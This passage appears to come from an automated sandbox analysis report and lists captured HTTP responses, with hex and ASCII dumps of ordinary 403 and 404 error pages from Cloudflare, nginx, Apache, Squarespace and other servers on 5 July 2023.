74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:44 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=QtWkqTZm0Detxod6CjjRcks%2BDtFiS%2BuNdpqawTqxK%2BGIYhkEaQavnf%2Fn07wdE92PN8%2Ff8eoOdDSDID4U7oCqqoggtSOA6NtazlY%2Fp8YvX5KYb4goCUAoSWpcUlrWkxW0"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7e1d6dec897d1e6c-FRAData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Jul 2023 06:07:44 GMTContent-Type: text/htmlContent-Length: 19268Connection: keep-aliveServer: ApacheLast-Modified: Fri, 13 May 2022 08:04:11 GMTAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 59 61 6b 75 48 61 6e 4a 50 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 e3 82 b7 e3 83 83 e3 82 af 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 20 22 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 20 50 72 6f 4e 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 4e 22 2c 20 56 65 72 64 61 6e 61 2c 20 4d 65 69 72 79 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 33 32 33 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 37 45 46 30 3b 0a 20 20 20 20 20 20 7d 0a 2
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:44 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveCache-Control: max-age=15Expires: Wed, 05 Jul 2023 06:07:59 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4YYhW8iwJ%2BToazWJ3u8spC4EWHVsEkcesGP2lBWofA%2FSWPlAHsT3G6w4319WX44pgplS0n4KdjGsGM9u8JvjfiDvbo4MD8mQ0RNh2IerGSuk%2BCFMjC%2F%2Fpv1diH0Oqg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 7e1d6def6c02049f-FRAalt-svc: h3=":443"; ma=86400Data Raw: 31 31 39 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d Data Ascii: 119c<!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Com
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Jul 2023 06:07:44 GMTContent-Type: text/html; charset=UTF-8Server: ghsContent-Length: 1561X-XSS-Protection: 0X-Frame-Options: SAMEORIGINData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:44 GMTContent-Type: text/htmlContent-Length: 548X-Seen-By: GXNXSWFXisshliUcwO20NXdyD4zpCpFzpCPkLds0yMdU2dumBKhu0CZVWGt/q/AG,qquldgcFrj2n046g4RNSVE8eNr0PeAeqFyO7fo2b794=X-Wix-Request-Id: 1688537264.9519535514416272X-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Via: 1.1 googleData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 05 Jul 2023 06:07:45 GMTContent-Type: text/htmlContent-Length: 552Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenAge: 0Cache-Control: no-cacheContent-Length: 77561Content-Type: text/html; charset=UTF-8Date: Wed, 05 Jul 2023 06:07:45 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceX-Contextid: 2r7Qiw3Z/dtt1MSB4Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:45 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveAccept-Ranges: bytesContent-Length: 904Keep-Alive: timeout=5, max=100Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 63 73 73 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 3e 20 20 20 0a 09 09 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 36 5d 3e 0a 09 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 09 09 64 69 76 2c 20 69 6d 67 7b 20 62 65 68 61 76 69 6f 72 3a 75 72 6c 28 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 73 63 72 69 70 74 73 2f 69 65 70 6e 67 66 69 78 2e 68 74 63 29 20 7d 0a 09 09 09 3c 2f 73 74 79 6c 65 3e 0a 09 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 62 6f 78 22 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 6f 62 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 72 61 64 22 3e 26 6e 62 73 70 3b 3c 2f 73 70 61 6e 3e 20 20 0a 09 09 09 09 09 3c 68 31 3e 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 68 31 3e 20 20 20 20 20 20 20 20 20 20 20 0a 09 09 09 09 09 3c 70 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 62 72 20 2f 3e 0a 09 09 09 09 09 53 69 65 20 76 65 72 66 c3 bc 67 65 6e 20 6e 69 63 68 74 20 c3 bc 62 65 72 20 64 69 65 20 6e 6f 74 77 65 6e 64 69 67 65 6e 20 52 65 63 68 74 65 2c 20 64 69 65 20 61 6e 67 65 66 6f 72 64 65 72 74 65 20 53 65 69 74 65 20 7a 75 20 62 65 74 72 65 74 65 6e 2e 3c 62 72 20 2f 3e 0a 09 09 09 09 09 42 69 74 74 65 20 77 65 6e 64 65 6e 20 53 69 65 20 73 69 63 68 20 61 6e 20 64 65 6e 20 57 65 62 6d 61 73 74 65 72 2e 3c 2f 70 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 